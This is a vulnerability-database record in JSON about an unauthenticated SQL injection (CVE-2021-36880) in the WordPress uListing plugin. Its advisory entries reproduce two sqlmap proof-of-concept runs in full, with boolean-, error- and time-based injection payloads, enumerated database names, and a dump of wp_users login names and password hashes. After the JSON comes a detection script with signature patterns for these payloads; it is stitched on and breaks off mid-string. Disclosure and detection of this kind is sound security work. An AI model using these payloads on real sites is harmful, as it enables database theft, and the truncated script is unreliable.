{"patchstack": [{"lastseen": "2022-06-01T19:31:18", "description": "Unauthenticated SQL Injection (SQLi) vulnerability discovered by m0ze (Patchstack Red Team) in WordPress uListing plugin (versions <= 2.0.3).\n\n## Solution\n\n\r\n Update the WordPress uListing plugin to the latest available version (at least 2.0.4).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T00:00:00", "type": "patchstack", "title": "WordPress uListing plugin <= 2.0.3 - Unauthenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36880"], "modified": "2021-07-26T00:00:00", "id": "PATCHSTACK:B31C1FA4F19BD2FD9F72E3B3B4323957", "href": "https://patchstack.com/database/vulnerability/ulisting/wordpress-ulisting-plugin-2-0-3-unauthenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-10-01T11:30:02", "description": "An Unauthenticated SQL Injection vulnerability was discovered in the plugin. Vulnerable parameter(s): custom. 
SQL Injection type(s): Error-based, Boolean-based Blind, Time-based Blind.\n\n### PoC\n\nPoC #1 | Unauthenticated SQL Injection | Tables: sqlmap --url=\"https://example.com/?ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\" -p range[price] --dbs ___ __H__ ___ ___[.]_____ ___ ___ {1.5.3.16#dev} |_ -| . [,] | .'| . | |___|_ [\"]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 16:47:59 /2021-06-18/ [16:47:59] [INFO] testing connection to the target URL [16:48:11] [INFO] testing if the target URL content is stable [16:48:25] [INFO] heuristic (basic) test shows that GET parameter 'range[price]' might be injectable (possible DBMS: 'MySQL') [16:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:51:11] [WARNING] reflective value(s) found and filtering out [16:51:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [16:52:02] [INFO] testing 'Generic inline queries' [16:52:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [16:54:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [16:55:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' [16:58:19] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' [16:58:53] [INFO] GET parameter 'range[price]' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable [16:58:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' 
[16:59:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [16:59:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [16:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [16:59:33] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [16:59:35] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [16:59:38] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [16:59:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [16:59:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [16:59:51] [INFO] GET parameter 'range[price]' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [16:59:51] [INFO] testing 'MySQL inline queries' [16:59:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [16:59:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [17:00:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [17:00:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [17:00:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [17:00:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [17:00:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [17:01:20] [INFO] GET parameter 'range[price]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [17:06:45] [INFO] target URL appears to be UNION injectable with 49 columns injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? 
[Y/n] Y [17:25:10] [INFO] testing 'MySQL UNION query (25) - 61 to 80 columns' [17:26:04] [INFO] testing 'MySQL UNION query (25) - 81 to 100 columns' GET parameter 'range[price]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests: \\--- Parameter: range[price] (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) RLIKE (SELECT (CASE WHEN (4580=4580) THEN 0x313939383b32393739 ELSE 0x28 END)) AND (5841=5841&amenities[]=16&current_page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 4060 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4201=4201&amenities[]=16&current_page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 9207 FROM (SELECT(SLEEP(60)))BqKJ) AND (1336=1336&amenities[]=16&current_page=1 \\--- [18:16:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.28 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [18:16:03] [INFO] fetching database names [18:16:03] [INFO] resumed: 'information_schema' [18:16:03] [INFO] resumed: 'db_inusti' [18:16:03] [INFO] resumed: 'db_tolips' [18:16:03] [INFO] resumed: 'db_krowd' [18:16:03] [INFO] resumed: 'db_halpes' [18:16:03] [INFO] resumed: 'db_kitecx' [18:16:03] [INFO] resumed: 'db_indutri' 
[18:16:03] [INFO] resumed: 'db_codesk' [18:16:03] [INFO] resumed: 'db_ziston' available databases [9]: [*] db_codesk [*] db_halpes [*] db_indutri [*] db_inusti [*] db_kitecx [*] db_krowd [*] db_tolips [*] db_ziston [*] information_schema [*] ending @ 18:16:03 /2021-06-18/ PoC #2 | Unauthenticated SQL Injection | wp_users data: sqlmap --url=\"https://example.com/?ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\" --dbms=MySQL -p bedrooms[],bathrooms[],garages[],amenities[] --dump -D db_halpes -T wp_users -C id,user_email,user_login,user_pass ___ __H__ ___ ___[(]_____ ___ ___ {1.5.4.7#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:15:24 /2021-06-18/ [10:15:25] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: \\--- Parameter: bedrooms[] (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) RLIKE (SELECT (CASE WHEN (7907=7907) THEN 37 ELSE 0x28 END)) AND ((2011=2011&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) AND (SELECT 4032 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 
((6842=6842&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) AND (SELECT 8493 FROM (SELECT(SLEEP(60)))bkzv) AND ((7707=7707&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1 \\--- [10:15:28] [INFO] testing MySQL [10:15:30] [INFO] confirming MySQL [10:15:32] [WARNING] reflective value(s) found and filtering out [10:15:32] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.28 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [10:15:32] [INFO] fetching entries of column(s) 'id,user_email,user_login,user_pass' for table 'wp_users' in database 'db_halpes' [10:15:37] [INFO] retrieved: '1' [10:15:41] [INFO] retrieved: 'admin' [10:15:44] [INFO] retrieved: '$P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/' [10:15:46] [INFO] retrieved: '2' [10:15:49] [INFO] retrieved: 'demo' [10:15:51] [INFO] retrieved: '$P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3.' [10:15:52] [INFO] retrieved: '3' [10:15:55] [INFO] retrieved: 'give_donor' [10:15:57] [INFO] retrieved: '$P$BUfswym5bmce6zMYuxpAv3J4992KyH.' [10:15:58] [INFO] retrieved: '4' [10:16:02] [INFO] retrieved: 'give_accountant' [10:16:04] [INFO] retrieved: '$P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1' [10:16:06] [INFO] retrieved: '5' [10:16:09] [INFO] retrieved: 'give_manager' [10:16:10] [INFO] retrieved: '$P$BsODaEu5jVKRPcp18M6KRbppca824U0' [10:16:12] [INFO] retrieved: '6' [10:16:15] [INFO] retrieved: 'give_worker' [10:16:17] [INFO] retrieved: '$P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px.' 
Database: db_halpes Table: wp_users [6 entries] +----+------------+-----------------+------------------------------------+ | id | user_email | user_login | user_pass | +----+------------+-----------------+------------------------------------+ | 1 | | admin | $P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/ | | 2 | | demo | $P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3. | | 3 | | give_donor | $P$BUfswym5bmce6zMYuxpAv3J4992KyH. | | 4 | | give_accountant | $P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1 | | 5 | | give_manager | $P$BsODaEu5jVKRPcp18M6KRbppca824U0 | | 6 | | give_worker | $P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px. | +----+------------+-----------------+------------------------------------+ [*] ending @ 11:03:34 /2021-06-18/ \n", "cvss3": {}, "published": "2021-07-26T00:00:00", "type": "wpvulndb", "title": "uListing < 2.0.4 - Unauthenticated SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-36880"], "modified": "2021-09-27T18:21:43", "id": "WPVDB-ID:7B32E28E-9092-4ECC-95D0-A2B9464B4A9C", "href": "https://wpscan.com/vulnerability/7b32e28e-9092-4ecc-95d0-a2b9464b4a9c", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-10-01T11:30:02", "description": "An Unauthenticated SQL Injection vulnerability was discovered in the plugin. Vulnerable parameter(s): custom. 
SQL Injection type(s): Error-based, Boolean-based Blind, Time-based Blind.\n", "cvss3": {}, "published": "2021-07-26T00:00:00", "type": "wpexploit", "title": "uListing < 2.0.4 - Unauthenticated SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-36880"], "modified": "2021-09-27T18:21:43", "id": "WPEX-ID:7B32E28E-9092-4ECC-95D0-A2B9464B4A9C", "href": "", "sourceData": "PoC #1 | Unauthenticated SQL Injection | Tables:\r\n\r\nsqlmap --url=\"https://example.com/?ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\" -p range[price] --dbs\r\n ___\r\n __H__\r\n ___ ___[.]_____ ___ ___ {1.5.3.16#dev}\r\n|_ -| . [,] | .'| . |\r\n|___|_ [\"]_|_|_|__,| _|\r\n |_|V... |_| http://sqlmap.org\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting @ 16:47:59 /2021-06-18/\r\n\r\n[16:47:59] [INFO] testing connection to the target URL\r\n[16:48:11] [INFO] testing if the target URL content is stable\r\n[16:48:25] [INFO] heuristic (basic) test shows that GET parameter 'range[price]' might be injectable (possible DBMS: 'MySQL')\r\n[16:51:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\r\n[16:51:11] [WARNING] reflective value(s) found and filtering out\r\n[16:51:57] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\r\n[16:52:02] [INFO] testing 'Generic inline queries'\r\n[16:52:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'\r\n[16:54:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'\r\n[16:55:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'\r\n[16:58:19] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'\r\n[16:58:53] [INFO] GET parameter 'range[price]' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable\r\n[16:58:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\r\n[16:59:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\r\n[16:59:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\r\n[16:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\r\n[16:59:33] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\r\n[16:59:35] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\r\n[16:59:38] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause 
(JSON_KEYS)'\r\n[16:59:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\r\n[16:59:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\r\n[16:59:51] [INFO] GET parameter 'range[price]' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\r\n[16:59:51] [INFO] testing 'MySQL inline queries'\r\n[16:59:53] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\r\n[16:59:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\r\n[17:00:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\r\n[17:00:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\r\n[17:00:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'\r\n[17:00:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'\r\n[17:00:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\r\n[17:01:20] [INFO] GET parameter 'range[price]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\r\n[17:06:45] [INFO] target URL appears to be UNION injectable with 49 columns\r\ninjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y\r\n[17:25:10] [INFO] testing 'MySQL UNION query (25) - 61 to 80 columns'\r\n[17:26:04] [INFO] testing 'MySQL UNION query (25) - 81 to 100 columns'\r\nGET parameter 'range[price]' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] n\r\nsqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests:\r\n---\r\nParameter: range[price] (GET)\r\n Type: boolean-based blind\r\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\r\n Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) RLIKE (SELECT (CASE WHEN (4580=4580) THEN 0x313939383b32393739 ELSE 0x28 END)) AND (5841=5841&amenities[]=16&current_page=1\r\n\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 4060 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4201=4201&amenities[]=16&current_page=1\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979) AND (SELECT 9207 FROM (SELECT(SLEEP(60)))BqKJ) AND (1336=1336&amenities[]=16&current_page=1\r\n---\r\n[18:16:03] [INFO] the back-end DBMS is MySQL\r\nweb application technology: PHP 7.3.28\r\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\r\n[18:16:03] [INFO] fetching database names\r\n[18:16:03] [INFO] resumed: 'information_schema'\r\n[18:16:03] [INFO] resumed: 'db_inusti'\r\n[18:16:03] [INFO] resumed: 'db_tolips'\r\n[18:16:03] [INFO] resumed: 'db_krowd'\r\n[18:16:03] [INFO] resumed: 'db_halpes'\r\n[18:16:03] [INFO] resumed: 'db_kitecx'\r\n[18:16:03] [INFO] resumed: 'db_indutri'\r\n[18:16:03] [INFO] resumed: 'db_codesk'\r\n[18:16:03] [INFO] resumed: 'db_ziston'\r\navailable databases [9]:\r\n[*] db_codesk\r\n[*] db_halpes\r\n[*] db_indutri\r\n[*] db_inusti\r\n[*] db_kitecx\r\n[*] db_krowd\r\n[*] 
db_tolips\r\n[*] db_ziston\r\n[*] information_schema\r\n\r\n[*] ending @ 18:16:03 /2021-06-18/\r\n\r\n\r\nPoC #2 | Unauthenticated SQL Injection | wp_users data:\r\n\r\nsqlmap --url=\"https://example.com/?ulisitng_title=13&region=50&category=47&bedrooms[]=37&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\" --dbms=MySQL -p bedrooms[],bathrooms[],garages[],amenities[] --dump -D db_halpes -T wp_users -C id,user_email,user_login,user_pass\r\n ___\r\n __H__\r\n ___ ___[(]_____ ___ ___ {1.5.4.7#dev}\r\n|_ -| . [,] | .'| . |\r\n|___|_ [)]_|_|_|__,| _|\r\n |_|V... |_| http://sqlmap.org\r\n\r\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\r\n\r\n[*] starting @ 10:15:24 /2021-06-18/\r\n\r\n[10:15:25] [INFO] testing connection to the target URL\r\nsqlmap resumed the following injection point(s) from stored session:\r\n---\r\nParameter: bedrooms[] (GET)\r\n Type: boolean-based blind\r\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\r\n Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) RLIKE (SELECT (CASE WHEN (7907=7907) THEN 37 ELSE 0x28 END)) AND ((2011=2011&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\r\n\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) AND (SELECT 4032 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6842=6842&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\r\n\r\n Type: time-based 
blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n Payload: ulisitng_title=13&region=50&category=47&bedrooms[]=37)) AND (SELECT 8493 FROM (SELECT(SLEEP(60)))bkzv) AND ((7707=7707&bathrooms[]=31&garages[]=43&range[area]=739;1606&range[price]=1998;2979&amenities[]=16&current_page=1\r\n---\r\n[10:15:28] [INFO] testing MySQL\r\n[10:15:30] [INFO] confirming MySQL\r\n[10:15:32] [WARNING] reflective value(s) found and filtering out\r\n[10:15:32] [INFO] the back-end DBMS is MySQL\r\nweb application technology: PHP 7.3.28\r\nback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)\r\n[10:15:32] [INFO] fetching entries of column(s) 'id,user_email,user_login,user_pass' for table 'wp_users' in database 'db_halpes'\r\n[10:15:37] [INFO] retrieved: '1'\r\n[10:15:41] [INFO] retrieved: 'admin'\r\n[10:15:44] [INFO] retrieved: '$P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/'\r\n[10:15:46] [INFO] retrieved: '2'\r\n[10:15:49] [INFO] retrieved: 'demo'\r\n[10:15:51] [INFO] retrieved: '$P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3.'\r\n[10:15:52] [INFO] retrieved: '3'\r\n[10:15:55] [INFO] retrieved: 'give_donor'\r\n[10:15:57] [INFO] retrieved: '$P$BUfswym5bmce6zMYuxpAv3J4992KyH.'\r\n[10:15:58] [INFO] retrieved: '4'\r\n[10:16:02] [INFO] retrieved: 'give_accountant'\r\n[10:16:04] [INFO] retrieved: '$P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1'\r\n[10:16:06] [INFO] retrieved: '5'\r\n[10:16:09] [INFO] retrieved: 'give_manager'\r\n[10:16:10] [INFO] retrieved: '$P$BsODaEu5jVKRPcp18M6KRbppca824U0'\r\n[10:16:12] [INFO] retrieved: '6'\r\n[10:16:15] [INFO] retrieved: 'give_worker'\r\n[10:16:17] [INFO] retrieved: '$P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px.'\r\nDatabase: db_halpes\r\nTable: wp_users\r\n[6 entries]\r\n+----+------------+-----------------+------------------------------------+\r\n| id | user_email | user_login | user_pass |\r\n+----+------------+-----------------+------------------------------------+\r\n| 1 | | admin | $P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/ |\r\n| 2 | | demo | $P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3. 
|\r\n| 3 | | give_donor | $P$BUfswym5bmce6zMYuxpAv3J4992KyH. |\r\n| 4 | | give_accountant | $P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1 |\r\n| 5 | | give_manager | $P$BsODaEu5jVKRPcp18M6KRbppca824U0 |\r\n| 6 | | give_worker | $P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px. |\r\n+----+------------+-----------------+------------------------------------+\r\n\r\n[*] ending @ 11:03:34 /2021-06-18/\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
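The record above shows the three injection techniques sqlmap confirmed against the uListing search filters (boolean-based RLIKE, error-based FLOOR/RAND over INFORMATION_SCHEMA, and time-based SLEEP) and the exact parameters it used (range[price], bedrooms[], bathrooms[], garages[], amenities[]). The following detection script is an added example, not code from WPScan, Patchstack or the uListing plugin: it scans a web access log for requests to those filter parameters whose values do not have the shape the plugin evidently expects (a plain integer, or an integer pair such as 739;1606 for the range filters, as inferred from the PoC URLs, which is an assumption) and labels the ones matching the payload families shown in the record. The combined log format and the sample log lines are constructed for the example; the parameter list, the value-shape regexes and the signature set are the author's choices, not anything the plugin documents.

```python
"""Flag exploitation attempts against the uListing search filters (CVE-2021-36880)
in a web access log.

Added example; not code from WPScan, Patchstack or the uListing plugin.
Assumptions: Apache/Nginx "combined" log format, and filter values that are plain
integers (region, category, bedrooms[], ...) or "min;max" integer pairs
(range[area], range[price]), which is the shape seen in the published PoC URLs.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Filter parameters taken from the PoC URLs, grouped by the value shape they appear to expect.
INT_PARAMS = {"ulisitng_title", "region", "category", "current_page",
              "bedrooms[]", "bathrooms[]", "garages[]", "amenities[]"}
RANGE_PARAMS = {"range[area]", "range[price]"}
INT_RE = re.compile(r"^\d{1,10}$")
RANGE_RE = re.compile(r"^\d{1,10};\d{1,10}$")

# Signatures for the payload families in the advisory, checked in this order.
SIGNATURES = [
    ("boolean-based blind (RLIKE)", re.compile(r"\bRLIKE\b", re.I)),
    ("error-based (FLOOR/RAND)", re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("time-based blind (SLEEP)", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("schema enumeration", re.compile(r"INFORMATION_SCHEMA", re.I)),
]

# Combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_query(target):
    """Split the query on '&' only: ';' is data here (range[area]=739;1606), not a separator."""
    pairs = []
    for chunk in urlsplit(target).query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_value(name, value):
    """Return None when the value has the expected shape, otherwise why it is suspicious."""
    if name in INT_PARAMS:
        if INT_RE.match(value):
            return None
    elif name in RANGE_PARAMS:
        if RANGE_RE.match(value):
            return None
    else:
        return None  # not a uListing filter parameter; out of scope for this check
    for label, sig in SIGNATURES:
        if sig.search(value):
            return label
    # Allowlist miss with no known signature: still worth a look (quote probes, new payloads).
    return "malformed value"


def scan_target(target):
    """Findings for one request target as (param, reason, decoded value) tuples."""
    findings = []
    for name, value in parse_query(target):
        reason = classify_value(name, value)
        if reason:
            findings.append((name, reason, value))
    return findings


def scan_log(lines):
    """Run the check over log lines; lines that are not combined-format requests are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, reason, value in scan_target(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "param": name, "reason": reason, "value": value})
    return hits


# Constructed sample lines: a normal search, the PoC payloads for range[price] and bedrooms[]
# as they would appear URL-encoded on the wire, a bare quote probe, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jun/2021:16:47:59 +0000] "GET /?ulisitng_title=13&region=50&category=47'
    '&bedrooms%5B%5D=37&range%5Barea%5D=739;1606&range%5Bprice%5D=1998;2979&current_page=1 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [18/Jun/2021:17:00:09 +0000] "GET /?ulisitng_title=13&region=50'
    '&range%5Bprice%5D=1998;2979)%20AND%20(SELECT%209207%20FROM%20(SELECT(SLEEP(60)))BqKJ)%20AND%20(1336=1336'
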